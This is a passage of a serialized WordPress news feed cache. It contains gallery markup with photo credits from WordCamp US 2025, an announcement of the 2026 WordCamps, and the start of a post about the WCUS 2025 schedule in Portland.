src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_215948.jpg?resize=1024%2C577&#038;ssl=1\" alt=\"\" class=\"wp-image-19112\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_215948-scaled.jpg?resize=1024%2C577&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_215948-scaled.jpg?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_215948-scaled.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_215948-scaled.jpg?resize=1536%2C865&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_215948-scaled.jpg?resize=2048%2C1153&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Gale Wallace</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693bf3c&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693bf3c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19124\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6997.jpeg?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-19124\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6997-scaled.jpeg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6997-scaled.jpeg?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6997-scaled.jpeg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6997-scaled.jpeg?resize=1536%2C864&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6997-scaled.jpeg?resize=2048%2C1152&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Topher DeRosia</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693c205&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693c205\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19122\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_7014.jpeg?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-19122\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_7014-scaled.jpeg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_7014-scaled.jpeg?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_7014-scaled.jpeg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_7014-scaled.jpeg?resize=1536%2C864&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_7014-scaled.jpeg?resize=2048%2C1152&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Topher DeRosia</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693c4c1&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693c4c1\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19107\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_101752.jpg?resize=1024%2C577&#038;ssl=1\" alt=\"\" class=\"wp-image-19107\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_101752-scaled.jpg?resize=1024%2C577&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_101752-scaled.jpg?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_101752-scaled.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_101752-scaled.jpg?resize=1536%2C865&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250826_101752-scaled.jpg?resize=2048%2C1153&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Gale Wallace</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693c763&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693c763\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"675\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19108\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/20250825_113602.jpg?resize=1024%2C675&#038;ssl=1\" alt=\"\" class=\"wp-image-19108\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/20250825_113602.jpg?resize=1024%2C675&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250825_113602.jpg?resize=300%2C198&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250825_113602.jpg?resize=768%2C506&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250825_113602.jpg?resize=1536%2C1012&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/20250825_113602.jpg?w=1764&amp;ssl=1 1764w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Gale Wallace</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693ca1e&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693ca1e\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19113\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC9076.jpeg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19113\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC9076-scaled.jpeg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC9076-scaled.jpeg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC9076-scaled.jpeg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC9076-scaled.jpeg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC9076-scaled.jpeg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693ccde&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693ccde\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"433\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19106\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6809.jpeg?resize=1024%2C433&#038;ssl=1\" alt=\"\" class=\"wp-image-19106\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6809-scaled.jpeg?resize=1024%2C433&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6809-scaled.jpeg?resize=300%2C127&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6809-scaled.jpeg?resize=768%2C325&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6809-scaled.jpeg?resize=1536%2C650&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6809-scaled.jpeg?resize=2048%2C866&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Topher DeRosia</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693cf8b&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693cf8b\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19110\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC04553.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19110\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC04553.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC04553.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC04553.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC04553.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC04553.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693d227&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693d227\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19119\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6827.jpeg?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-19119\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6827-scaled.jpeg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6827-scaled.jpeg?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6827-scaled.jpeg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6827-scaled.jpeg?resize=1536%2C864&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_6827-scaled.jpeg?resize=2048%2C1152&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Topher DeRosia</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693d4da&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693d4da\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19133\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG-20250829-WA0024.jpg?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-19133\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG-20250829-WA0024.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG-20250829-WA0024.jpg?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG-20250829-WA0024.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG-20250829-WA0024.jpg?resize=1536%2C864&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG-20250829-WA0024.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n</figure>\n\n\n\n<p>Be sure to mark your calendars for the next global gatherings: <a href=\"https://asia.wordcamp.org/2026/\">WordCamp Asia 2026</a>&nbsp; in Mumbai, India, <a href=\"https://europe.wordcamp.org/2026/\">WordCamp Europe 2026</a>&nbsp; in Kraków, Poland, and WordCamp US 2026 in Phoenix, Arizona. We can’t wait to see you at the next chapter of the WordPress story.</p>\n\n\n\n<p></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"19074\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"Portland, Are You Ready? The WCUS 2025 Schedule Has Arrived!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"https://wordpress.org/news/2025/08/portland-are-you-ready-the-wcus-2025-schedule-has-arrived/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 06 Aug 2025 20:03:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:6:\"Events\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:4:\"WCUS\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:9:\"WordCamps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=19004\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:402:\"We’re excited to announce that the full schedule for WordCamp US 2025 has been published! From August 26–29 in Portland, Oregon, join web creators, innovators, and community leaders for four days of learning, collaboration, and inspiration. This year’s lineup brings together sessions on everything from cutting-edge AI to hands-on workshops, performance, accessibility, design, and the [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brett McSherry\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5698:\"\n<p>We’re excited to announce that the full schedule for WordCamp US 2025 has been published! From August 26–29 in Portland, Oregon, join web creators, innovators, and community leaders for four days of learning, collaboration, and inspiration. This year’s lineup brings together sessions on everything from cutting-edge AI to hands-on workshops, performance, accessibility, design, and the future of WordPress.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/ScheduleHeader.png?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-19026\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/ScheduleHeader-scaled.png?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/ScheduleHeader-scaled.png?resize=300%2C169&amp;ssl=1 300w, 